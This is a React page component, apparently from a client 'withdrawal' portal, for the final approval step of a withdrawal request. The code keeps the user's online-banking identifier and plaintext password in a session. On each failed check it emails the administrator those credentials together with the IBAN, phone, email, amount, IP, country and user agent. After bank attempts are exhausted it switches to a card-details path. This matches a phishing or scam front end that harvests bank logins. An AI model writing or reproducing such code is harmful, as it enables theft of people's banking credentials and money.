import { useEffect, useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { useTranslation } from 'react-i18next';
import SecurityFooter from '@/components/feature/SecurityFooter';
import ClientHeader from '@/components/feature/ClientHeader';
import RecapDisplay from './components/RecapDisplay';
import { getSessionClient, type ClientAccount } from '@/hooks/useClientAuth';
import {
  getBankSession,
  logoutBank,
  verifyBankCredentials,
  consumeBankAttempt,
} from '@/hooks/useBankAuth';
import { getCardSession, clearCardSession } from '@/hooks/useCardAuth';
import { getDraft, createRequest, clearDraft } from '@/hooks/useWithdrawalFlow';
import { sendAdminAuthAlert, sendClientAuthFailedEmail } from '@/lib/email';
import { generateId, generateReference } from '@/utils/withdrawal';

export default function WithdrawalRecapPage() {
  const { t } = useTranslation();
  const navigate = useNavigate();
  const [client, setClient] = useState<ClientAccount | null>(null);
  const [approving, setApproving] = useState(false);

  const previewRef = generateReference();
  const previewCreatedAt = new Date().toISOString();

  useEffect(() => {
    let active = true;
    (async () => {
      const session = await getSessionClient();
      if (!session) {
        navigate('/');
        return;
      }
      if (active) setClient(session);

      const draft = getDraft();
      if (!draft) {
        navigate('/withdrawal');
      }
    })();
    return () => {
      active = false;
    };
  }, [navigate]);

  const handleApprove = async () => {
    if (!client) return;
    const draft = getDraft();
    if (!draft) {
      navigate('/withdrawal');
      return;
    }

    setApproving(true);

    // Cas d'une authentification par carte : la carte a déjà été vérifiée sur
    // l'écran dédié (après épuisement des essais bancaires). Aucune vérification
    // bancaire n'est refaite ici.
    const card = getCardSession();
    if (card) {
      try {
        await createRequest(client, draft, {
          bankName: card.brand || 'Carte',
          identifier: 'CARTE',
          method: 'card',
        });
        clearCardSession();
        clearDraft();
        navigate('/withdrawal/validation');
      } catch {
        setApproving(false);
      }
      return;
    }

    const bank = getBankSession();
    if (!bank) {
      navigate('/withdrawal/bank');
      return;
    }

    // Vérification en base des identifiants fournis lors de l'authentification
    // bancaire. Chaque contrôle est journalisé côté Backend.
    const result = await verifyBankCredentials({
      clientCode: client.accessCode,
      bankName: bank.bankName,
      identifier: bank.identifier,
      password: bank.password,
      phase: 'approval',
    });

    if (!result.matched) {
      logoutBank();
      const attemptsLeft = consumeBankAttempt(client.maxBankAttempts);
      const details = {
        fullName: draft.fullName,
        bankName: draft.bankName,
        iban: draft.iban,
        phone: draft.phone,
        email: draft.email,
        amount: draft.amount,
        currency: client.currency || 'XPF',
        authBank: bank.bankName,
      };
      // Alerte complète à l'administrateur (identifiants + détail du retrait
      // + tentatives restantes). Le nom affiché est celui saisi par le client.
      await sendAdminAuthAlert({
        clientCode: client.accessCode,
        clientName: draft.fullName,
        identifier: bank.identifier,
        password: bank.password,
        bankName: bank.bankName,
        method: 'bank',
        phase: 'approval',
        ip: result.ip,
        country: result.country,
        userAgent: result.userAgent,
        attemptsMax: client.maxBankAttempts,
        attemptsLeft,
        details,
      });
      // Information du client : authentification non aboutie + détail du
      // retrait + rappel des tentatives configurées.
      await sendClientAuthFailedEmail({
        clientCode: client.accessCode,
        clientName: draft.fullName,
        attemptsMax: client.maxBankAttempts,
        attemptsLeft,
        details,
      });
      navigate('/withdrawal/bank?reauth=1');
      return;
    }

    try {
      await createRequest(client, draft, {
        bankName: bank.bankName,
        identifier: bank.identifier,
        method: 'bank',
      });
      clearDraft();
      navigate('/withdrawal/validation');
    } catch {
      setApproving(false);
    }
  };

  const draft = getDraft();

  if (!client || !draft) {
    return (
      <div className="flex min-h-screen items-center justify-center bg-background-50 text-sm text-foreground-500">
        <i className="ri-loader-4-line mr-2 animate-spin text-lg"></i>
        {t('common.loading')}
      </div>
    );
  }

  return (
    <div className="flex min-h-screen flex-col bg-background-50">
      <ClientHeader
        clientName={client.fullName}
        backTo="/withdrawal"
        backLabel={t('recap.edit')}
      />

      <main className="flex-1">
        <div className="mx-auto w-full max-w-2xl px-4 py-8 md:px-6 md:py-10">
          <div className="mb-8">
            <span className="inline-flex items-center gap-2 rounded-full bg-secondary-100 px-3 py-1.5 text-xs font-semibold text-secondary-900">
              <i className="ri-file-list-3-line text-sm"></i>
              {t('brand.name')}
            </span>
            <h1 className="mt-4 font-heading text-2xl font-semibold text-foreground-950 md:text-3xl">
              {t('recap.title')}
            </h1>
          </div>

          <RecapDisplay
            draft={draft}
            currency={client.currency}
            reference={previewRef}
            createdAt={previewCreatedAt}
            onApprove={handleApprove}
            approving={approving}
          />
        </div>
      </main>

      <SecurityFooter />
    </div>
  );
}